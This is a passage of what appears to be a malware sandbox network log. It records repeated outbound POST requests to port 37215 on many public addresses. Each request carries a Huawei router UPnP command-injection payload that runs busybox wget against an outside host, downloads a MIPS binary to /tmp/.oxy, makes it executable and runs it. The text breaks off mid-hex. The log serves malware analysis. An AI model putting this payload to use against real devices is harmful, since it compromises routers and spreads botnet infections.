                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  991192.168.2.135107841.73.98.21337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.457899094 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  992192.168.2.1343328197.105.27.14837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.457922935 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  993192.168.2.1352298197.233.189.8637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.458026886 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  994192.168.2.1332962197.234.167.12437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.458064079 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  995192.168.2.1358694197.169.74.19237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.458261967 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  996192.168.2.1334420157.61.1.14237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.458641052 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  997192.168.2.134801278.44.143.10337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.458661079 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  998192.168.2.1359628157.13.202.9837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.459017038 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  999192.168.2.1343886216.106.44.3937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.459034920 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1000192.168.2.1345300157.66.104.20537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.459395885 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 